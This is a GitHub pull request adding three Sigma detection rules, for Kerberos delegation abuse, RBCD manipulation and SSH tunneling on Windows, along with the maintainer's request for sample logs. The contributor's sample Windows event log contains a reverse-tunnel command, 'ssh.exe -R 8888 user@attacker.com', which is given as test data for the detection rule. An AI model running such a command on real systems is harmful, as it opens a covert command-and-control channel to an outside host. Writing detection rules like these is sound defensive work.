Skip to content

3 New rules #5747

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
louiselalanne wants to merge 9 commits into
base: master
Choose a base branch
from
Open

3 New rules #5747

louiselalanne wants to merge 9 commits into from
+68 −0

Conversation

@louiselalanne
Copy link

@louiselalanne louiselalanne commented Nov 8, 2025

Summary of the Pull Request

This PR adds three new detection rules for common attack techniques:

  1. Kerberos Delegation abuse detection via ticket options analysis
  2. Resource-Based Constrained Delegation (RBCD) manipulation detection
  3. SSH Tunneling detection for command and control activities

These rules help detect privilege escalation, persistence, and C2 communication attempts commonly used in post-exploitation scenarios.

Changelog

new: Suspicious Kerberos Ticket Request - S4U2Proxy
new: Kerberos Constrained Delegation
new: SSH Tunneling via SSH Client on Windows

Example Log Event

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

@louiselalanne
Create win_security_susp_kerb_ticket_request_s4u2proxy.yml
de5d914
@louiselalanne
Add Kerberos Constrained Delegation detection rule
149f0c5 
This rule detects changes to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute in Active Directory, which may indicate potentially malicious RBCD configuration.
@louiselalanne
Update SSH tunneling rule for Windows clients
9297e05
@louiselalanne
Modify references in win_security_ssh_tunneling.yml
1c0bebb 
Updated references for SSH tunneling detection.
@louiselalanne
Update date in win_security_ssh_tunneling.yml
70b8c33
@louiselalanne
Change date to 2025-11-08 in security rule
34074b7 
Updated the date for the win_security_kerberos_constrained_delegation rule.
@github-actions github-actions bot added Rules Windows Pull request add/update windows related rules labels Nov 8, 2025
github-actions[bot]
github-actions bot reviewed Nov 8, 2025
View reviewed changes
Copy link
Contributor

@github-actions github-actions bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Welcome @louiselalanne 👋

It looks like this is your first pull request on the Sigma rules repository!

Please make sure to read the SigmaHQ conventions document to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.

Thanks again, and welcome to the Sigma community! 😃

@nasbench
Copy link
Member

nasbench commented Nov 12, 2025

Hey @louiselalanne can you please provide an example event log for the plink / ssh execution as well as one for the susp ticket.

@nasbench nasbench added Author Input Required changes the require information from original author of the rules Additional Data Needed labels Nov 12, 2025
@louiselalanne
Copy link
Author

louiselalanne commented Nov 12, 2025

hi @nasbench, the log for suspicious kerberos:
RBCD_10
and this ios the log for ssh tunneling:
Nov 1 16:44:04 lab.ad.local MSWinEventLog 1 Security 886051789 Wed Nov 12 16:44:04 2025 4688 Microsoft-Windows-Security-Auditing N/A N/A Success Audit lab.ad.local N/A A new process has been created. Creator Subject: Security ID: S-1-5-21-1426336784-303251576-769581337-11846 Account Name: lois.lane Account Domain: AD Logon ID: 0x1D0454E6 Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x654 New Process Name: C:\OpenSSH-Win64\ssh.exe Token Elevation Type: %%1937 Mandatory Label: S-1-16-12288 Creator Process ID: 0xc5c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\OpenSSH-Win64\ssh.exe" -R 8888 user@attacker.com Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 10171094

@louiselalanne
Copy link
Author

louiselalanne commented Nov 12, 2025

thanks for your time (:

@louiselalanne
Simplify condition for SSH tunneling detection
fdea342 
Removed selection_flags condition for SSH tunneling.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@github-actions github-actions[bot] github-actions[bot] left review comments

At least 2 approving reviews are required to merge this pull request.

Assignees

No one assigned

Labels

Additional Data Needed Author Input Required changes the require information from original author of the rules Rules Windows Pull request add/update windows related rules

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@louiselalanne @nasbench